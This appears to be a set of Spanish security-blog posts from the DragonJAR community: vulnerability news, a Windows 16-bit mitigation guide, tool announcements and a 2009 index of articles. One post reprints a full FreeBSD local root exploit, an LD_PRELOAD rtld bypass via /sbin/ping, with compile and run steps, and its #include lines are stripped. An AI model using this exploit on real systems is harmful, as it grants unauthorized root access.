Este fallo descubierto por el investigador Tavis Ormandy (miembro del equipo de seguridad de google), se aprovecha del soporte heredado de aplicaciones de 16 bits que Windows viene heredando desde su versión “NT” y permite a un atacante obtener privilegios de SYSTEM (máximo privilegio en el sistema) en un sistema vulnerable.

Aunque todavía no existe un parche para este fallo de seguridad,  solo tendremos que deshabilitar el soporte para aplicaciones de 16 bits para proteger nuestro sistema, a continuación les dejo una serie de pasos a seguir para desactivarlo:

1. Inicio/Ejecutar gpedit.msc
2. Abrir “Configuración de equipo”/ “Plantillas administrativas”/ “Componentes de Windows”/”Compatibilidad de aplicación”
3. Y habilitar “Impedir el acceso a aplicaciones de 16 bits”

O puedes seguir los pasos de los siguientes vídeos según tu sistema operativo

Windows Server 2003:

Windows Server 2008

Para Windows XP:

Ya existe un exploit publicado para este bug que funciona correctamente incluso en Windows 7, puedes encontrar el código fuente en este enlace, o el exploit compilado aquí, por lo tanto es MAS QUE RECOMENDADO que desactives el soporte para 16 bits de tu sistema y actualices el mismo con Windows Update tan pronto salga el parche que corrija este problema.

Mas Información:
Grave vulnerabilidad en Windows permite elevar privilegios
Vulnerabilidad muy crítica en todas las versiones de Windows

También puede interesarte...

• Actualiza tu equipo con Windows
• Microsoft Publica parche que corrige Vulnerabilidad “Critica”
• Recuperar Contraseñas de Windows 7, Vista y Anteriores
• Dentro del corazón de Windows Server 2008
• Guia de Seguridad de Windows Server 2003
• Video: Explotando WM Downloader
• Parches para Windows que corrigen Vulnerabilidades Criticas
• Denegacion de Servicio desde el WordPad

ENERO

Artículos

• Gana Mas Espacio para Navegar con tu Firefox
• Webcast sobre Seguridad en Mac OS X
• Cárcel y Multas para Delitos Informáticos en Colombia
• Las Peores 500 Contraseñas de Todos los Tiempos
• Bloquear telefonos celulares Nokia con un SMS
• Secuestro de Frames Inocentes
• Hotmail ahora soporta POP3
• Manual en Español de Redes con VirtualBox
• Hacking de Redes UPnP – (Parte I – Parte II – Parte III)
• Hackers… El bien y el mal

Herramientas

• Grendel-Scan
• FireCAT 1.5
• Browser Ride
• Código Fuente Herramienta para SQL Injection

Eventos

• Memorias del DISI 2008

FEBRERO

Artículos

• Instalar Mac OS X Leopard en un PC con Procesador Intel o AMD
• Desbloquea (Jailbreak) el iPod Touch 2G e iPhone en Mac
• “1234″ y “password” son las Contraseñas + Utilizadas en USA
• Sin SSL ¿Y Ahora Quien Podrá Defendernos?
• Cursos Gratis de Diseño Web en el Sena Virtual
• Cursos Gratis de Informática en el Sena Virtual
• La Mejor Defensa es la Información
• Drivers para Soporte Nativo de Tarjetas Broadcom en GNU Linux

Herramientas

• BackTrack 4 Beta (Otra)
• Todos los Vídeos de AntiChat – (Parte I – Parte II)
• Desbloquea (Jailbreak) el iPod Touch 2G e iPhone en Windows
• Metasploit Framework 3.2 Portable para Windows
• CAINE, LiveCD para Informática Forense

MARZO

Artículos

• Desbloquear iPod Touch 2G Fácilmente
• Infección Virus a través de Redes Sociales
• Vídeo Tutorial Honeypot
• Video Tutorial de Nessus y Baseline Security Analyzer
• Video Tutorial Fingerprint y Escaneo Básico
• Vídeo Tutorial Sniffing
• Vídeo Tutorial de IPTables
• Los Hackers también son personas
• Disponible en descarga SAMM (Software Assurance Maturity Model)
• Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux

Herramientas

• Adeona – Rastrea tu Portatil Robado
• Prey – Rastrea tu Computador Robado

Eventos

• Congreso Nacional de Estudiantes de Ingeniería de Sistemas XVIII

ABRIL

Artículos

• Cómo eliminar el Gusano Conficker
• ¿Como saber si tu equipo esta infectado con el Conficker?
• Instalando Varios Sistemas Operativos en un Acer One (Parte I – Parte II – Parte III)
• Laboratorios de Seguridad Informática

Herramientas

• Webtunnel – Herramienta para realizar Encapsulación HTTP

Eventos

• Vídeo de Richard Stallman para el FLISOL 2009
• Resumen y presentaciones de la Comunidad DragonJAR en el Flisol 2009
• Memorias CNEIS XVIII

MAYO

Artículos

• Manual de TrueCrypt
• Bloqueo de sitios Web usando el archivo HOSTS
• Saltar Captchas

Herramientas

• Moth
• NetworkMiner, Herramienta forense de Análisis de Red
• DVWA – Damn Vulnerable Web App
• Discos Booteables Kaspersky
• IPTraf, estadísticas sobre el tráfico de tu red
• Dradis, organiza y comparte información en un Test de Penetración

Eventos

• Laboratorios de Seguridad Informática en Bogotá
• Charla de Seguridad Web Gratuita – Barcelona España
• Las charlas de TED (Technology Entertainment Design) en Español
• Memorias ExpoDefensa 2009
• ¿Qué se siente asistir a una DEFCON?
• La Comunidad DragonJAR te lleva a la Campus Party
• Laboratorios Realizados de La Comunidad DragonJAR

JUNIO

Artículos

• Detección de WebDAV, verificación de la vulnerabilidad y explotación
• Filtrar sitios Webs usando OpenDNS desde Linux (Video)
• Vinton Cerf (Creador de Internet) en Colombia
• Instalar VMware Workstation 6.5 en Arch Linux
• Consejos, Guías y Recomendaciones para la Protección de la Información
• Los mejores “malos” consejos para que su red WIFI fracase
• ¿Nos conocemos? Protección de menores en redes sociales y chats
• Ciber Guerrillas – Documental sobre las Guerras Cibernéticas
• Las mejores extensiones de Firefox para mejorar tu privacidad
• Las mejores extensiones de Firefox para mejorar tu seguridad
• Consejos Simples de Seguridad para ir a la Campus Party
• Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.0 para iPhone y iPod Touch
• Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.0 para iPhone y iPod Touch
• InstaLinux, Personaliza la instalación de tu distribución GNU/Linux
• Comunidad DragonJAR en Open Source University Meetup – OSUM

Herramientas

• WEPBuster, automatizando la auditoría de redes inalámbricas
• 5 Distribuciones GNU/Linux para Pentesting

Eventos

• BarCamp Medellín
• Crónica sobre BarCamp Medellín 2009
• Ganadores de las entradas a la Campus Party Colombia

JULIO

Artículos

• Curso en el Sena Virtual sobre Auditoria en Seguridad
• Resetear contraseña de root con GRUB
• Tip: Enviar archivos por SSH con rsync
• OLPC y Sugar en Colombia
• Descargar desde Rapidshare con Wget
• OWASP Testing Guide 3.0 en Español
• WUDE 3.0
• Migrar instalación de Linux a una partición ó disco diferente
• Curso de Ubuntu
• Curso de Redes en GNU Linux
• Curso Gratis de Joomla
• Curso de Dibujo Vectorial con OpenOffice Draw
• Firmando Documentos y Correos con GPG
• Gestionando las impresiones en MAC, Windows y GNU Linux

Herramientas

• NMap 5.0
• Varias Distribuciones Live CD de Seguridad en un DVD
• 10 extraordinarias herramientas para hacer copias de seguridad en Linux

Eventos

• DragoN Party 2009
• Seguridad Informática con Software Libre
• Kevin Mitnick – The Art Of Deception – Video Conferencia
• Memorias del Black Hat USA 2009

Entrevistas

• Entrevista con Jorge Uyá, Director de TBSolutions Latino America
• Entrevista exclusiva con Kevin Mitnick para La Comunidad DragonJAR

AGOSTO

Artículos

• zsh: Una shell interactiva más amigable para el usuario
• Renombrar interfaces de red estáticamente con Udev
• Forzando Conexiones SSL por defecto
• Biblioteca de Vídeos Sobre Seguridad Informática
• Cambiar Password de Switch CISCO
• Utilizando tu Portatil como Segundo Monitor
• Solucionar crashes inesperados de Firefox 3.5
• Denegacion de Servicio desde el WordPad
• Cuidado con los correos en tu iPhone o iPod Touch
• NFS, Compartiendo archivos en red
• La Comunidad DragonJAR en LemonTV.tv

Herramientas

• WifiWay 1.0
• PentBox – Una suite de seguridad y pentesting en ruby

Eventos

• Encuentro Internacional de Seguridad Informática – EISI III

Entrevistas

• Entrevista con Andrés Eduardo Ormaza, sobre la ley de delitos informaticos en colombia
• Entrevista a Richard Stallman para Tuxinfo

SEPTIEMBRE

Artículos

• Memoria USB Booteable con Varias Distribuciones de Seguridad Informática
• Crackear redes inalambricas con WPA en 1 Minuto
• Metodología Básica de Análisis Forense – (Parte 1 de 4 – Parte 2 de 4 – Parte 3 de 4 – Parte 4 de 4)
• Linutop 3 – La Pequeña PC Basada en Linux
• Procedimientos De Obtención De Evidencia En Windows
• Curso Completo de Metasploit Framework
• FIREWALLS – Diseño y Panorámica Actual
• Configuracion segura de GMail

Herramientas

• Damn Vulnerable Web App
• Aircrack NG v1.0 Final
• Cain & Abel
• Process Hacker
• Katana – Múltiples Distribuciones de Seguridad en tu USB

Eventos

• Fedora Linux Day 2009 – Chile

OCTUBRE

Artículos

• Felicidades Comunidad + Regalos
• E-zine #4 Comunidad DragonJAR
• ¿Cómo encontrar versiones antiguas de programas?
• Top 100 Herramientas de Seguridad Open Source
• Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.1.2 para iPhone y iPod Touch
• Sec-Track.com Proyecto Colaborativo de Entrenamiento en Seguridad Informática
• Como quemar un archivo DMG en Windows y GNU Linux
• Descarga Gratis el Libro de Una al Día

Eventos

• Tercer Encuentro Internacional de Seguridad Informática – (Día I – Día II – Día III)
• Videos de las Jornadas de Seguridad Informatica ArCERT

Entrevistas

• Entrevista a Jose Maria “Chema” Alonso para La Comunidad DragonJAR
• IV Freedom & Open Source Day – Lima Perú
• 2do Congreso Nacional de Hacking Ético (Bogotá, Colombia)

NOVIEMBRE

Artículos

• Criterios para la Evaluación de los Escaners de Seguridad Web
• ¿Que Mirar Cuando Auditamos una Base de Datos Oracle?
• ¿Que son los Sniffers?
• ¿Qué es la Ingeniería Social?
• ¿Qué son los Firewalls?
• ¿Qué son los Proxies?
• Debilidad en Protocolos
• El reemplazo de Milw0rm
• Instalación, Configuración y Uso del Microsoft Cofee
• ¿Cómo Recuperar una Cuenta de Facebook?
• ¿Como Eliminar la Contraseña de un PDF?
• Recogiendo Evidencias para Análisis Forense en Windows
• XLSInjector – Inyectar Shell Meterpreter en Archivos Excel
• TestDisk – Recupera tus Particiones y Archivos

Herramientas

• Binging – Footprinting utilizando Bing
• Listado de Diccionarios para Realizar Ataques de Fuerza Bruta

Entrevistas

• Entrevista a Cristian Borghello para La Comunidad DragonJAR

DICIEMBRE

Artículos

• Fallo en FreeBSD permite obtener root
• Multiples Vulnerabilidades en SMF
• Ingeniería Inversa en Aplicación JAVA y JNLP
• Servidor de DNS Publico por parte de Google
• OSSEC – Sistema de Detecion de Intrusos Basado en Host
• GNU Linux con apariencia de Windows XP
• Prueba Android en un Live CD
• Foro de BackTrack en Español
• MySQL Podria Morir, !Colabora¡
• Convierte tu Webcam en una Cámara de Vigilancia
• Primer Reto de Análisis Forense de la Comunidad DragonJAR

Herramientas

• Metasploit Framework 3.3.2
• CAINE – Distribución Live CD para Análisis Forense
• Matriux, GNU/Linux live CD para Test de Penetración
• Análisis del caso “Autopsy hecho en Medellín”
• Pentoo versión final 2009, GNU/Linux para Test de Penetración
• Wapiti – Escaner de Vulnerabilidades en Aplicaciones Web
• WAFP – Detecta la Versión de una Aplicación Web

Les dejo entonces un buen listado de contenidos de calidad, para que se entretengan estas vacaciones… Que lo disfruten…

PD. FELIZ AÑO NUEVO, LES DESEA LA COMUNIDAD DRAGONJAR

También puede interesarte...

• Transmitiendo en VIVO desde La Campus Party Colombia
• DragoN Party 2009
• La Comunidad DragonJAR te lleva a la Campus Party
• Laboratorios de Seguridad Informática en Bogotá
• Inscripciones para La Campus Party Colombia 2009
• Lo mejor del 2008
• COMBAT Training v2.0 en Colombia
• Memorias del DISI 2009

Felicitaciones a fuurio y el equipo que hizo posible este nuevo espacio para los hispanohablantes.

Entrar al Foro en Español de Back-Track

También puede interesarte...

• Taxonomía de un Ataque con Backtrack 4
• Resultado del Primer Reto Forense de La Comunidad DragonJAR
• ¿Cómo tomar control de un Dominio en Windows?
• Backtrack 4 Final
• El reemplazo de Milw0rm
• E-zine #4 Comunidad DragonJAR
• Katana – Múltiples Distribuciones de Seguridad en tu USB
• Curso Completo de Metasploit Framework

Esta basado en un modelo de cliente-servidor, con lo cual tendremos un servidor centralizado que se encarga de recibir y actuar en base a la información que reciba de los agentes que, en definitiva, son las máquinas que están siendo monitorizadas y atacadas. La forma de actuar del servidor es, por una parte, enviando notificaciones, y por otro lado, si así se configura, generando reglas firewall que se ejecutarán en los propios agentes.

Funciona en la mayoría de sistemas operativos, incluyendo Linux, OpenBSD, FreeBSD, MacOS, Solaris y Windows, ademas acaba de salir la nueva version 2.3 de este proyecto, la cual incluye:

1. Registro de las reglas de análisis para el servidor web nginx
2. Registro de las normas de análisis de suhosin (Hardened PHP)
3. Soporte para la vigilancia de integridad de archivos en tiempo real en los sistemas Windows
4. Soporte para el control de la salida de los comandos (control de proceso)
5. Y mucho más (para ver la lista entera de cambios, click aqui)…

Descargar OSSEC 2.3

Mas Información:
Pagina Oficial del OSSEC

También puede interesarte...

• Gestionando las impresiones en MAC, Windows y GNU Linux
• Como quemar un archivo DMG en Windows y GNU Linux
• Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.1.2 para iPhone y iPod Touch
• Aircrack NG v1.0 Final
• Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.0 para iPhone y iPod Touch
• Manual de TrueCrypt
• Instalando Varios Sistemas Operativos en un Acer One – Parte I
• Adeona – Rastrea tu Portatil Robado

El error reside en el Run-Time-Link Editor (rtld), que normalmente no permite variables de entorno peligrosas como LD_PRELOAD pero con una técnica sencilla el rtld pueden ser engañado para que acepte variables LD, incluso en los binarios setugid.
VERSIONES DE FREEBSD AFECTADAS
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NO VULNERABLE
FreeBSD 4.9-RELEASE *** NO VULNERABLE

Para más detalles ver el exploit.

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include

main() {
extern char **environ;
environ = (char**)malloc(8096);

environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include
#include
#include
#include

void _init() {
extern char **environ;
environ=NULL;
system("echo ALEX-ALEX;/bin/sh");
}
_EOF

Para compilar y ejecutar

gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

Mas Información en el Full Disclosure publicado por Nikolaos Rangos

También puede interesarte...

• Video: Explotando WM Downloader
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• Vulnerabilidad 0-day en todas las versiones de Windows
• Vídeo: Introducción al Metasploit Framework
• Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash
• Multiples Vulnerabilidades en SMF
• ¿Que Mirar Cuando Auditamos una Base de Datos Oracle?
• XSS que permite postear a atacante registrado en WordPress

En esta ocasión les voy a hablar del que a mi parecer será el sucesor de milw0rm y continuara con el legado dejado por str0ke, se trata de explo.it un portal que pretende ser una base de datos de exploits como lo era milw0rm pero con algunos beneficios que listare a continuación:

1. Es mantenido por los desarrolladores de Ofensive Security, quienes nos han regalado ya alegrías como el famoso BackTrack.
2. El sistema de búsqueda ha sido mejorado.
3. Ahora es posible descargar la aplicación a la que afecta el exploit, dando click en la letra [A], incentivando aun mas la investigación de los fallos explotados.

Por estos motivos creo que explo.it es el nuevo Milw0rm y desde La Comunidad DragonJAR le damos todo el apoyo a este proyecto para que siga adelante, ¿conoces alguna otra alternativa? háznosla saber en los comentarios.

También puede interesarte...

• Curso Completo de Metasploit Framework
• ¿Cómo tomar control de un Dominio en Windows?
• Taxonomía de un Ataque con Backtrack 4
• Video: Explotando WM Downloader
• Backtrack 4 Final
• Foro de BackTrack en Español
• ¿Que Mirar Cuando Auditamos una Base de Datos Oracle?
• Katana – Múltiples Distribuciones de Seguridad en tu USB

El segundo problema no es explicado claramente en el comunicado oficial de WordPress, solo nos comentan que el error se  encuentra el sistema de archivos y que podría provocar vulnerabilidades en ciertas configuraciones de Apache y que lo ha Dawid Golunski.

Es recomendable que actualicen su versión de WordPress, ya sea por el panel de administración o descargando la ultima version desde su pagina oficia,  para asegurarse de que tiene la mejor protección disponible.

También puede interesarte...

• XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2
• WordPress 2.6.3 vulnerable a Cross Site Scripting
• Los Blogs alojados en WordPress.com Vulnerables
• Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash
• Multiples Vulnerabilidades en SMF
• Reseteo Remoto del Password de Admin en WordPress
• Actualiza a WordPress 2.6.5
• Actualiza a WordPress 2.6.3

Los fallos son bastante graves permitiendo a un atacante la ejecución de código remoto o realizar un ataque de denegación de servicios en el pc que corra una de las aplicaciones vulnerables, les dejo un listado con los fallos de seguridad y el software afectado para que puedan determinar si tienen software vulnerable e instalen los parches:

• Boletin de Seguridad MS09-063 – Critico
  Vulnerability in Web Services on Devices API Could Allow Remote Code Execution (973565)
• Boletin de Seguridad MS09-064 – Critico
  Vulnerability in License Logging Server Could Allow Remote Code Execution (974783)
• Boletin de Seguridad MS09-065 – Critico
  Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947)
• Boletin de Seguridad MS09-066 – Importante
  Vulnerability in Active Directory Could Allow Denial of Service (973309)
• Boletin de Seguridad MS09-067 – Importante
  Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (972652)
• Boletin de Seguridad MS09-068 – Importante
  Vulnerability in Microsoft Office Word Could Allow Remote Code Execution (976307)

Es muy recomendable que actualices tu sistema operativo y tu suite ofimática para evitar la oleada de gusanos y malware que no demoran en explotar estos fallos para propagarse por toda la red.

Actualizar tu Windows desde la pagina de Microsoft Windows Update

Fuente:
Microsoft Security Bulletin

También puede interesarte...

• Microsoft Publica parche que corrige Vulnerabilidad “Critica”
• Vulnerabilidad 0-day en todas las versiones de Windows
• Denegacion de Servicio desde el WordPad
• Detección de WebDAV, verificación de la vulnerabilidad y explotación
• Actualiza tu equipo con Windows
• Video Tutorial de Nessus y Baseline Security Analyzer
• La Mejor Defensa es la Información
• Microsoft publica 8 Nuevas Actualizaciones de seguridad

Por motivo de su cumpleaños numero 11 hispasec ha decidido actualizar y publicar de forma gratuita su libro en formato digital, para distrute de todos nosotros.

Descargar gratis Libro de Hispasec “Una al día”

Mas Información:
Pagina Oficial de Hispasec

También puede interesarte...

• El Atacante Informático – Capítulo 2
• Antivirus para Mac OS X Gratis
• Licencia Gratis para Kaspersky Internet Security
• Descargar Ashampoo WinOptimizer Gratis
• Curso en el Sena Virtual sobre Auditoria en Seguridad
• Descargar Gratis Internet Explorer 8 Final
• Cursos Gratis de Diseño Web en el Sena Virtual
• Cárcel y Multas para Delitos Informáticos en Colombia

¿Qué es Sec-Track?

Sec-Track es un proyecto colaborativo que ofrece un repositorio de recursos relacionados con la implementación y el desarrollo de laboratorios  de entrenamiento e investigación sobre Seguridad Informática. Estos recursos son distribuidos por  medio de entornos virtualizados que asemejan entornos reales, dichos entornos pueden ser implementados en diferentes ambientes de capacitación e investigación.

Sec-Track ofrece también un amplio repertorio de instrucciones para la implementación de entornos de virtualización, con la finalidad de que cada interesado en implementar uno de los laboratorios y/o entornos disponibles pueda hacerlo simplemente siguiendo dichas instrucciones.
Sec-Track pone a disposición la documentación base para el desarrollo de entornos virtualizados por parte de los usuarios inscritos. Estos serán publicados en Sec-Track y cualquier persona, organización o entidad podrá descargarlos y tratar de cumplir con los objetivos propuestos por sus desarrolladores o proponer nuevas metas.

Otro de los objetivos de Sec-Track es ofrecer un espacio colaborativo en el cual, las diferentes comunidades, grupos de investigación, empresas y usuarios puedan publicar sus propios entornos de entrenamiento, retos y pruebas, wargames, CTF, Crackmes en cualquiera de las diferentes temáticas, con la finalidad de que las demás comunidades puedan descargarlos e implementarlos para buscar una solución al mismo, pero aun más importante generar la respectiva documentación de dicho proceso.

¿Cómo puedo participar en Sec-Track?

Todos son bienvenidos a Sec-Track (Y).

Sec-Track pone a disposición una serie de recursos para la implementación de laboratorios de entrenamiento en seguridad (entornos, retos, wargames, pruebas, CTF, documentación, etc) cada usuario puede descargar y poner a prueba sus conocimientos o adquirirlos siguiendo los video tutoriales y documentación publicada.

Los usuarios más avanzados pueden proponer nuevas formas de cumplir dichos objetivos, nuevos retos o mejorar los ya existentes.

¿Cuáles son las temáticas que abarca Sec-Track?

Sec-Track tratará de cubrir cada una de las temáticas relacionadas con la seguridad informática. Por ahora ofrece los siguientes campos de acción:

• Test de Penetración
• Análisis de Malware
• Criptografía
• Aseguramiento (Hardening)
• Ingeniería Inversa
• Informática Forense
• Gobierno IT

Video introductorio al proyecto >>

Más información >>

Web Oficial del Proyecto Colaborativo Sec-Track

También puede interesarte...

• Ciberterrorismo
• Security Freak – Videos de iniciacion en seguridad de la informacion
• ¿Como Eliminar la Contraseña de un PDF?
• Algunos aspectos dogmáticos de la delincuencia informática
• Crece la tendencia de desprestigiar a los demás en Internet
• Red Social de Hackers, “House of Hackers”
• Las APIS de Microsoft al Descubierto!!
• El Libro de NMap